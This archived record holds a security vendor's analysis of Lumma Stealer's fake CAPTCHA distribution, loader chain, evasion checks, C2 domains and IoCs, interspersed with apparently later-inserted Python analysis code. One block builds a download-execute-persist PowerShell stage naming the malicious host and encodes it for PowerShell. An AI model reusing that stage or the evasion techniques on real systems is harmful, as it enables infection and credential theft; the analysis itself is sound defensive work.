{
	"id": "746cdaa3-7dfc-4fb4-9f02-663e7c666373",
	"created_at": "2026-04-06T01:31:05.345676Z",
	"updated_at": "2026-04-10T03:21:25.475798Z",
	"deleted_at": null,
	"sha1_hash": "7778968af6c6ee437d4c6cbb535dd164b04e0866",
	"title": "Lumma Stealer – Tracking distribution channels",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1493940,
	"plain_text": "Lumma Stealer – Tracking distribution channels\r\nBy Elsayed Elrefaei\r\nPublished: 2025-04-21 · Archived: 2026-04-06 00:35:04 UTC\r\nIntroduction\r\nThe evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals,\r\nwith information stealers becoming one of the most commercially successful categories in this underground\r\neconomy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its\r\nintroduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information\r\nstealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence\r\non dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers.\r\nLummaC2 seller’s official website\r\nLumma delivery usually involves human interaction, such as clicking a link, running malicious commands, etc.\r\nRecently, while investigating an incident as part of our incident response services, our Global Emergency\r\nResponse Team (GERT) encountered Lumma on a customer’s system. The analysis revealed that the incident was\r\ntriggered by human interaction, namely the user was tricked into executing a malicious command by a fake\r\nCAPTCHA page. In this article, we will review in detail how the fake CAPTCHA campaign works and share a list\r\nof IoCs that we discovered during our analysis and investigation of the campaign. Although we already described\r\nthis distribution method in an earlier article, more details about this campaign have been discovered since then.\r\nhttps://securelist.com/lumma-fake-captcha-attacks-analysis/116274/\r\nPage 1 of 17\n\nLumma Stealer’s distribution vectors\r\nLumma Stealer’s distribution methods are diverse, using common techniques typically seen in information-stealing malware campaigns. 
Primary infection vectors include phishing emails with malicious attachments or links, as well as trojanized legitimate applications. These deceptive tactics trick users into executing the malware, which then runs silently in the background harvesting valuable data. Lumma has also been observed using exploit kits, social engineering, and compromised websites to extend its reach and evade detection by security solutions. In this article, we focus mainly on the fake CAPTCHA distribution vector.\r\nThis vector involves fake verification pages that resemble legitimate services, often hosted on platforms that use Content Delivery Networks (CDNs). These pages typically masquerade as frequently used CAPTCHAs, such as Google reCAPTCHA or Cloudflare CAPTCHA, to trick users into believing they are interacting with a trusted service.\r\nFake CAPTCHA distribution vectors\r\nFake CAPTCHA distribution scheme\r\nThere are two types of resources used to promote fake CAPTCHA pages:\r\nPirated media, adult content, and cracked software sites. The attackers clone these websites and inject malicious advertisements into the cloned page that redirect users to a malicious CAPTCHA.\r\nFake Telegram channels for pirated content and cryptocurrencies. The attackers create Telegram channels with names containing keywords related to cryptocurrencies or pirated content, such as software, movies, etc. When a user searches for such content, the fraudulent channels appear at the top of the search results. The attackers also use social media posts to lure victims to these channels. 
When a user joins such a channel, they are prompted to complete an identity verification via a fraudulent “Safeguard Captcha” bot.\r\nSafeguard Captcha bot\r\nOnce the user clicks the Verify button, the bot opens a pop-up page with a fake CAPTCHA.\r\nFake CAPTCHA page\r\nUsers are presented with a pop-up page that looks like a standard CAPTCHA verification, prompting them to click I’m not a robot/Verify/Copy or some similar button. However, this is where the deception begins.\r\nFake CAPTCHA page examples\r\nFake page malicious content\r\nWhen the I’m not a robot/Verify/Copy button is clicked, the user is instructed to perform an unusual sequence:\r\n1. Open the Run dialog (Win+R)\r\n2. Press Ctrl+V\r\n3. Hit Enter\r\nWithout the user’s knowledge, clicking the button runs script on the page that places a PowerShell command on the clipboard. Once the user pastes the command into the Run dialog and presses Enter, Windows executes it in the user’s own session: the browser downloads nothing and no elevation prompt appears, so the usual warning signs are absent.\r\nExamples of scripts copied to the clipboard and executed via the Run dialog\r\nThe command may vary slightly from site to site and changes every few days, but it is typically used to download Lumma Stealer from a remote server, which is usually a known CDN with a free trial period or a legitimate code hosting and collaboration platform such as GitHub, and begin the malware installation process. Let’s take a closer look at this infection chain using the following command that was executed in our customer’s incident as an example:\r\nCommand triggering Lumma’s infection chain\r\nThe command is rather simple. It decodes and runs the contents of the remote win15.txt file hosted at https[:]//win15.b-cdn[.]net/win15.txt. 
The win15.txt file contains a Base64-encoded PowerShell script that then downloads and runs Lumma Stealer. When decoded, the malicious PowerShell script looks like this:\r\nContents of win15.txt\r\nThe script performs the following actions:\r\n1. Downloads the malware. It downloads the win15.zip file from https[:]//win15.b-cdn[.]net/win15.zip to [User Profile]\\AppData\\Roaming\\bFylC6zX.zip.\r\n2. Extracts the malware. The downloaded ZIP file is extracted to C:\\Users\\[User]\\AppData\\Roaming\\7oCDTWYu, a hidden folder under the user’s AppData directory.\r\n3. Executes the malware. The script runs the Set-up.exe file from the unpacked archive, which is now located at C:\\Users\\[User]\\AppData\\Roaming\\7oCDTWYu\\Set-up.exe.\r\n4. Establishes persistence. The script creates a Windows Registry entry so that the malware runs each time the user logs on. The value is added under HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the name 5TQjtTuo and data pointing to Set-up.exe.\r\nHowever, in some cases, the malware delivery mechanism can be more complex. In the following example, the delivery script is JavaScript code hidden in what looks like an .mp3 file (other file formats such as .mp4 and .png have also been used). 
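The win15.txt stage above is a Base64 blob that has to be decoded before anything can be read off it. As an added example (my own code, not the article’s), here is a small Python triage helper that decodes such a stage and pulls out what an analyst wants first: the URLs it contacts, the paths it touches under AppData, whether it writes a CurrentVersion/Run value, and whether it follows the download-then-execute pattern. The embedded stage is constructed from the four actions listed above using the file, folder and value names the article reports (win15.zip, bFylC6zX.zip, 7oCDTWYu, Set-up.exe, 5TQjtTuo); it is not the recovered script, and the cmdlet spelling is an assumption. The decoder also accepts the UTF-16LE form that powershell.exe -EncodedCommand expects, which is the other common way such stages are packed.

```python
import base64
import re

# Constructed sample stage (not the script recovered in the incident): it strings
# together the four actions the article attributes to win15.txt, using the file
# and value names reported there, so the triage output can be checked by eye.
SAMPLE_STAGE = '; '.join([
    'Invoke-WebRequest -Uri https://win15.b-cdn.net/win15.zip -OutFile $env:APPDATA/bFylC6zX.zip',
    'Expand-Archive -Path $env:APPDATA/bFylC6zX.zip -DestinationPath $env:APPDATA/7oCDTWYu',
    'Start-Process $env:APPDATA/7oCDTWYu/Set-up.exe',
    'New-ItemProperty -Path HKCU:/SOFTWARE/Microsoft/Windows/CurrentVersion/Run '
    '-Name 5TQjtTuo -Value $env:APPDATA/7oCDTWYu/Set-up.exe',
])
SAMPLE_B64 = base64.b64encode(SAMPLE_STAGE.encode('utf-8')).decode('ascii')


def encode_for_powershell(script: str) -> str:
    '''Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, then Base64).'''
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def decode_stage(b64_text: str) -> str:
    '''Decode a Base64 stage, whether it is plain UTF-8 text (as in win15.txt)
    or the UTF-16LE form used with -EncodedCommand.'''
    raw = base64.b64decode(''.join(b64_text.split()))
    # ASCII text encoded as UTF-16LE has a zero byte in every odd position
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        return raw.decode('utf-16-le')
    return raw.decode('utf-8', errors='replace')


def triage_stage(b64_text: str) -> dict:
    '''Summarise what a decoded stage does: URLs contacted, paths under AppData,
    Run-key persistence, and the download-then-execute pattern.'''
    text = decode_stage(b64_text)
    # fold backslashes into forward slashes so both path spellings match below
    norm = text.replace(chr(92), '/').lower()
    return {
        'urls': sorted(set(re.findall(r'https?://[a-z0-9._/-]+', norm))),
        'appdata_paths': sorted(set(re.findall(r'[^ ;]*appdata[^ ;]*', norm))),
        'run_key_persistence': 'currentversion/run' in norm,
        'downloads_and_executes': 'invoke-webrequest' in norm and 'start-process' in norm,
    }


if __name__ == '__main__':
    for key, value in triage_stage(SAMPLE_B64).items():
        print(key, value)
```

Run against a real stage, feed the raw Base64 text to triage_stage; the returned dictionary is what you would paste into a ticket before going deeper. Returning to the .mp3 variant introduced above: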
In fact, in addition to the JavaScript, the file may contain a corrupt .mp3/.mp4 file, legitimate software code, or just random data.\r\nThe script is executed using the Microsoft HTML Application engine mshta.exe by prompting the user to paste the following command into the Run dialog box:\r\nCommand triggering JS-based infection chain\r\nmshta does not care about the file extension: it parses whatever it is handed as an HTA file (Microsoft HTML Application) and executes any JavaScript code within the \u003cscript\u003e tag, triggering the following infection chain:\r\nLayer (1)\r\nThe JS script inside the .mp3 file is executed by mshta.\r\nJS script within the never.mp3 file\r\nLayer (2)\r\nAfter calculating the Kwb value, the following script is obtained, which is then executed by the eval function.\r\nLayer (2) JS script\r\nLayer (3)\r\nAfter calculating the values for kXN and zzI, the final ActiveX command is built and executed. It contains an encoded PowerShell script in the $PBwR variable.\r\nDeobfuscated Layer (2) JS script\r\nLayer (4)\r\nAfter decoding the PowerShell script, we found that its main purpose is to download and execute another PowerShell file from the C2 path hXXps://connect[.]klipfuzj[.]shop/firefire[.]png.\r\nDecrypted Layer (3) PowerShell script\r\nAnalysis of firefire.png\r\nThe file firefire.png is a huge PowerShell file (~31MB) with several layers of obfuscation and anti-debugging. After deobfuscating and removing unnecessary code, we could see that the main purpose of the file is to generate and execute an encrypted PowerShell script as follows:\r\nfirefire.png\r\nThe decryption key is the output of the Invoke-Metasploit command, which is blocked if AMSI is enabled. 
As a result, AMSI generates an error message, AMSI_RESULT_NOT_DETECTED, and that message is used as the key. If AMSI is disabled, the call does not produce the error and the malware fails to decrypt the script, so this stage only runs on hosts where AMSI is active.\r\nThe decrypted PowerShell script is approximately 1.5MB in size and its main purpose is to create and run a malicious executable file.\r\nDecrypted PowerShell script\r\nInfection methods and techniques\r\nLumma Stealer has been observed in the wild using a variety of infection methods, with two primary techniques standing out in its distribution campaigns: DLL sideloading and injection of a malicious payload into the overlay of legitimate free software. These techniques are particularly effective at evading detection because they exploit the trust that users place in widely used applications and system processes.\r\nDLL sideloading\r\nDLL sideloading is a well-known technique where malicious dynamic link libraries (DLLs) are loaded by a legitimate application. It abuses applications that resolve a DLL by name from their own directory (or another writable location) before the system directories, so that an attacker-supplied library with the expected name is picked up instead of the real one. Attackers can drop the Lumma Stealer DLL in the same directory as a trusted application, causing it to load when the application is executed. Because the malicious DLL is loaded in the context of a trusted, often signed, process, it is much harder for traditional security measures to detect the intrusion.\r\nInjection of malicious payload into the overlay section of software\r\nAnother method commonly used by Lumma Stealer is to inject a malicious payload into the overlay of free software. The overlay is the data appended to a PE file after its last section: the Windows loader does not map it into memory, and it is normally used by installers and self-extracting archives to carry their packed payload, and by signed binaries to hold the Authenticode signature. 
Because the loader ignores that region, the adversary can append the malicious payload there without disrupting the normal operation of the application, and the code that does run reads the payload back at runtime. This method is particularly insidious because the software continues to appear legitimate while the malicious code silently executes in the background. It also helps the malware evade detection by security tools that focus on system-level monitoring.\r\nBoth of these methods rely on exploiting trusted applications, which significantly increases the chances of successful infection. These techniques can be used in combination with others, such as phishing or trojanized software bundles, to maximize the spread of Lumma Stealer to multiple targets.\r\nSample analysis\r\nTo demonstrate how the Lumma Stealer installers work and the impact on systems and data security, we analyze the stealer sample we found in the incident at our customer. This sample uses the overlay injection technique. Below is a detailed breakdown of the infection chain and the various techniques used to deploy and execute Lumma Stealer.\r\nInitial execution and self-extracting RAR (SFX)\r\nThe initial payload in this sample is delivered as ProjectorNebraska.exe, which consists of a corrupt legitimate file with the malware in the overlay. It is executed by the victim. Upon execution, the file extracts and runs a self-extracting RAR (SFX) archive. This archive contains the next stage of the infection: a Nullsoft Scriptable Install System (NSIS) installer. NSIS is a widely used tool for creating Windows installers.\r\nNSIS installer components\r\nThe NSIS installer drops several components that are critical to the malware’s execution:\r\nNSIS installer components\r\nThese include AutoIt components and an obfuscated batch script loader named Hose.cmd. 
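To make the overlay concrete before going through the dropped components, here is an added Python example (my illustration, not the article’s tooling) that locates a PE file’s overlay the way a triage script does: it parses the section table, takes everything past the highest PointerToRawData + SizeOfRawData, and matches the first bytes against a few archive signatures, including the RAR signature that an SFX stub’s payload starts with. The input is a constructed minimal PE built by build_test_pe (one section, empty optional header), not ProjectorNebraska.exe; the header offsets are those of the PE/COFF format. One caveat a practitioner needs is in the comments: signed executables also carry an overlay, because the Authenticode signature is stored there, so an overlay by itself proves nothing.

```python
import struct

PE_SIGNATURE = b'PE' + bytes(2)
SECTION_HEADER_SIZE = 40

# First bytes of a few containers worth recognising in an overlay. The RAR
# signature prefix covers both RAR4 (... 07 00) and RAR5 (... 07 01 00).
OVERLAY_MAGICS = [
    (bytes.fromhex('526172211a07'), 'RAR archive (payload of a self-extracting stub)'),
    (b'PK' + bytes.fromhex('0304'), 'ZIP archive'),
    (b'MZ', 'PE executable'),
]


def find_overlay(pe: bytes):
    '''Return (offset, data) of the overlay: everything after the last byte that
    any section header maps from the file. The loader never maps this region,
    which is why SFX stubs, installers and Authenticode signatures all live there.'''
    if pe[:2] != b'MZ':
        raise ValueError('not a PE file: missing MZ header')
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError('not a PE file: missing PE signature')
    # COFF header follows the signature: NumberOfSections at +2, SizeOfOptionalHeader at +16
    coff = e_lfanew + 4
    num_sections = struct.unpack_from('<H', pe, coff + 2)[0]
    opt_size = struct.unpack_from('<H', pe, coff + 16)[0]
    section_table = coff + 20 + opt_size
    end = section_table + SECTION_HEADER_SIZE * num_sections
    for i in range(num_sections):
        hdr = section_table + SECTION_HEADER_SIZE * i
        # SizeOfRawData at +16 and PointerToRawData at +20 within the section header
        raw_size, raw_ptr = struct.unpack_from('<II', pe, hdr + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    end = min(end, len(pe))   # a truncated file has no overlay, not a negative one
    return end, pe[end:]


def classify_overlay(data: bytes) -> str:
    '''Name the overlay content by magic bytes. Caveat: a legitimately signed
    binary also has an overlay holding its Authenticode signature, so treat an
    archive signature here as a lead, and an overlay alone as no verdict at all.'''
    if not data:
        return 'none'
    for magic, label in OVERLAY_MAGICS:
        if data.startswith(magic):
            return label
    return 'unknown'


def build_test_pe(section_data: bytes, overlay: bytes) -> bytes:
    '''Constructed minimal PE for testing: one .text section at file offset 0x200
    and an empty optional header. Not a runnable executable, just a valid layout.'''
    raw_ptr = 0x200
    dos_header = b'MZ' + bytes(0x3C - 2) + struct.pack('<I', 0x40)   # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, 0, 0x0102)
    section = struct.pack('<8sIIIIIIHHI', b'.text', len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = dos_header + PE_SIGNATURE + coff + section
    return headers + bytes(raw_ptr - len(headers)) + section_data + overlay


if __name__ == '__main__':
    sample = build_test_pe(b'X' * 16, bytes.fromhex('526172211a0700') + b'stub payload')
    offset, data = find_overlay(sample)
    print(hex(offset), classify_overlay(data))
```

On a real sample, read the file into bytes and call find_overlay; if classify_overlay names an archive, carve the overlay to disk and open it with the matching tool, which for this sample would expose the SFX payload and the NSIS installer inside it. Back to the dropped components: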
The following AutoIt components are dropped:\r\nFragments of a legitimate AutoIt executable: These are pieces of a genuine AutoIt executable that are dropped to the victim’s system and then reassembled during the infection process.\r\nCompiled AutoIt script: The compiled script carries the core functionality of Lumma Stealer, including operations such as credential theft and data exfiltration.\r\nThese components are later reassembled into the final executable payload using the batch script loader, which concatenates and executes the various fragments.\r\nHose.cmd orchestrates the final steps of the malware’s execution. Below is a breakdown of its key components (after deobfuscation):\r\nDeobfuscated batch script code\r\nProcess tree after executing the batch script\r\nThe batch script performs the following actions:\r\nSecurity product evasion. The script scans for the presence of security software (SecureAnywhere and Quick Heal AntiVirus) using the tasklist command. If either of them is detected, it delays execution via the ping -n 198 command, which pings localhost 198 times at the default one-second interval, a pause of a little over three minutes. This trick is used to avoid sandbox detection, as a sandbox typically ends its run before the script completes the ping task. The script then checks for the presence of any of the following: Avast, AVG, McAfee, Bitdefender, Sophos, again using tasklist. If one of them is detected, it keeps the executable name for AutoIt as AutoIt3.exe; otherwise, it renames it to Suggests.pif.\r\nEnvironment setup and payload preparation. It sets environment variables for the AutoIt executable and the final payload. It also creates a working directory named 195402 in the Temp directory to store malicious components.\r\nObfuscation and extraction. 
The script filters and cleans a file named Sitting from the NSIS installer by removing the string OptimumSlipProfessionalsPerspective and storing the result as Suggests.pif. It then uses the copy /b command to merge Suggests.pif with an additional component from the NSIS installer named Oclc into the AutoIt executable, saving it again as Suggests.pif.\r\nPayload assembly. It concatenates multiple files from the NSIS installer (Italy, Holmes, True, etc.) to produce the final payload, h.a3x, which is a compiled AutoIt script.\r\nExecution of Lumma Stealer. Finally, the script runs Suggests.pif, which in turn executes h.a3x, triggering the AutoIt-based execution of Lumma Stealer.\r\nAutoIt script analysis\r\nDuring the analysis, the AutoIt Extractor utility was used to decompile and extract the script from the h.a3x file. The script was heavily obfuscated and required additional deobfuscation to get a clean and analyzable .au3 script. Below is the analysis of the AutoIt loader’s behavior.\r\nAutoIt script extraction\r\nAnti-analysis checks\r\nThe script begins by validating the environment to detect analysis tools or sandbox environments. It checks for specific computer names and usernames often associated with testing environments.\r\nEnvironment validation\r\nIt then checks for processes from popular antivirus tools such as Avast (avastui.exe), Bitdefender (bdagent.exe), and Kaspersky (avp.exe).\r\nAnti-AV checks\r\nIf any of these conditions are met, the script halts execution to evade detection.\r\nExecuting loader shellcode\r\nIf the anti-analysis checks are passed, the script dynamically selects 32-bit or 64-bit shellcode based on the system architecture; both variants are stored in the $vinylcigaretteau variable inside the script. 
To run it, the script allocates executable memory and copies the shellcode into it. The shellcode then initializes the execution environment and prepares for the second-stage payload.\r\nPart of the AutoIt loader responsible for the shellcode execution\r\nProcessing the $dayjoy payload\r\nAfter executing the loader shellcode, the script processes the second-stage payload located in the $dayjoy variable. The payload is decrypted using RC4 with the hardcoded key 1246403907690944.\r\nThe encrypted payload\r\nTo decrypt the payload independently, we wrote a custom Python script that you can see in the screenshot below.\r\nPython script for payload decryption\r\nThe decrypted payload is decompressed using the LZNT1 algorithm.\r\nPayload decompression\r\nFinal payload execution\r\nAfter decryption and decompression, the $dayjoy payload is executed in memory. The script uses DllCallAddress to invoke the payload directly in the allocated memory. This ensures the payload is executed stealthily without being written to disk.\r\nFinal payload execution\r\nThis final payload is the stealer itself. The malware’s comprehensive data theft capabilities target a wide range of sensitive information, including:\r\nCryptocurrency wallet credentials (e.g., Binance, Ethereum) and associated browser extensions (e.g., MetaMask)\r\nTwo-factor authentication (2FA) data and authenticator extensions\r\nBrowser-stored credentials and cookies\r\nStored credentials from remote access tools such as AnyDesk\r\nStored credentials from password managers such as KeePass\r\nSystem and application data\r\nFinancial information such as credit card numbers\r\nC2 communication\r\nOnce Lumma Stealer is executed, it establishes communication with its command and control (C2) servers to exfiltrate the stolen data. 
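The screenshot referenced above is the authors’ decryption script; what follows is an added, independent Python reimplementation of the same two steps for the $dayjoy payload, not the article’s code: RC4 with the key 1246403907690944 quoted from the sample, then LZNT1 decompression. The LZNT1 routine decodes the chunked format that Windows RtlDecompressBuffer produces, including the offset/length split that slides as a chunk fills and the overlapping back-references a byte-wise copy must handle. The input is constructed: a hand-assembled LZNT1 chunk that expands to EXPECTED_PLAINTEXT, run through RC4 with that key so the block can check itself offline; a real $dayjoy blob would be passed to recover_payload in the same way.

```python
# Hardcoded RC4 key the AutoIt loader uses for the $dayjoy payload (from the sample)
RC4_KEY = b'1246403907690944'


def rc4(key: bytes, data: bytes) -> bytes:
    '''Plain RC4 (KSA + PRGA). Symmetric, so the same call encrypts and decrypts.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _lznt1_chunk(chunk: bytes) -> bytes:
    '''Decode one compressed LZNT1 chunk: a flag byte, then 8 tokens; a clear
    bit is a literal byte, a set bit is a 16-bit (offset, length) back-reference.'''
    out = bytearray()
    pos = 0
    while pos < len(chunk):
        flags = chunk[pos]
        pos += 1
        for bit in range(8):
            if pos >= len(chunk):
                break
            if not (flags >> bit) & 1:
                out.append(chunk[pos])
                pos += 1
                continue
            token = int.from_bytes(chunk[pos:pos + 2], 'little')
            pos += 2
            # The split between offset and length bits slides as output grows:
            # 4 offset bits while at most 16 bytes are out, 5 up to 32, and so on.
            written = len(out) - 1
            length_mask, offset_shift = 0x0FFF, 12
            while written >= 0x10:
                length_mask >>= 1
                offset_shift -= 1
                written >>= 1
            length = (token & length_mask) + 3
            offset = (token >> offset_shift) + 1
            if offset > len(out):
                raise ValueError('back-reference before start of chunk')
            start = len(out) - offset
            for k in range(length):       # byte-wise so overlapping references repeat correctly
                out.append(out[start + k])
    return bytes(out)


def lznt1_decompress(data: bytes) -> bytes:
    '''Walk the chunk headers: bit 15 = compressed, bits 0..11 = chunk size minus 1.'''
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], 'little')
        pos += 2
        if header == 0:              # terminator
            break
        size = (header & 0x0FFF) + 1
        chunk = data[pos:pos + size]
        pos += size
        out += _lznt1_chunk(chunk) if header & 0x8000 else chunk
    return bytes(out)


def recover_payload(blob: bytes, key: bytes = RC4_KEY) -> bytes:
    '''The loader steps in order: RC4-decrypt, then LZNT1-decompress.'''
    return lznt1_decompress(rc4(key, blob))


# Constructed test vector: one compressed chunk (header 0xB007: compressed, 8 bytes)
# with flag byte 0x10, literals A B C D, a back-reference of offset 4 and length 8
# encoded as token 0x3005, then a literal '!'.
LZNT1_SAMPLE = bytes.fromhex('07b0 10 41424344 0530 21')
EXPECTED_PLAINTEXT = b'ABCDABCDABCD!'
ENCRYPTED_SAMPLE = rc4(RC4_KEY, LZNT1_SAMPLE)   # what a $dayjoy-style blob looks like

if __name__ == '__main__':
    print(recover_payload(ENCRYPTED_SAMPLE))
```

The decompressed output of a real blob should start with an MZ header, which is a quick sanity check that both the key and the chunk parsing are right before the result is loaded into a disassembler. Returning to the C2 traffic: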
The malware sends the collected information back to the attacker’s infrastructure for further exploitation. This communication is typically performed over HTTP or HTTPS, often disguised as legitimate traffic to avoid detection by network security monitoring tools.\r\nC2 servers identified\r\nThe following C2 domains used by Lumma Stealer to communicate with the attackers were identified in the analyzed sample:\r\nreinforcenh[.]shop\r\nstogeneratmns[.]shop\r\nfragnantbui[.]shop\r\ndrawzhotdog[.]shop\r\nvozmeatillu[.]shop\r\noffensivedzvju[.]shop\r\nghostreedmnu[.]shop\r\ngutterydhowi[.]shop\r\nThese domains are used to receive stolen data from infected systems. Communication with these servers is typically via encrypted HTTP POST requests.\r\nConclusions\r\nAs a mass-distributed malicious program, Lumma Stealer employs a complex infection chain that includes a number of anti-analysis and detection evasion techniques to stealthily infiltrate the victim’s device. Although the initial infection via dubious pirated software and cryptocurrency-related websites and Telegram channels suggests that individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers, which illustrates that organizations can also fall victim to this threat. The information stolen by such malware may end up in the hands of more prominent cybercriminals, such as ransomware operators. That’s why it’s important to prevent stealer infections at the early stages. By understanding the infection techniques, security professionals can better defend against this growing threat and develop more effective detection and prevention strategies.\r\nIoCs\r\nThe following list contains the URLs detected during our research. 
Note that the attackers change the malicious URLs and Telegram channels almost daily, and the IoCs provided in this section were already inactive at the time of writing. However, they may be useful for retrospective threat detection.\r\nMalicious fake CAPTCHA pages\r\nseenga[.]com/page/confirm.html\r\nserviceverifcaptcho[.]com\r\ndownloadsbeta[.]com\r\nintelligenceadx[.]com\r\ndownloadstep[.]com\r\nnannyirrationalacquainted[.]com\r\nsuspectplainrevulsion[.]com\r\nstreamingsplays[.]com\r\nbot-detection-v1.b-cdn[.]net\r\nbot-check-v5.b-cdn[.]net\r\nspam-verification.b-cdn[.]net\r\nhuman-test.b-cdn[.]net\r\nb-cdn[.]net\r\nNote that b-cdn[.]net itself is the shared hostname domain of a commercial CDN, so match on the specific subdomains above rather than blocking the apex.\r\nTelegram channels distributing Lumma\r\nt[.]me/hitbase\r\nt[.]me/sharmamod\r\nSource: https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/"
	],
	"report_names": [
		"116274"
	],
	"threat_actors": [],
	"ts_created_at": 1775439065,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.pdf",
		"text": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.txt",
		"img": "https://archive.orkl.eu/7778968af6c6ee437d4c6cbb535dd164b04e0866.jpg"
	}
}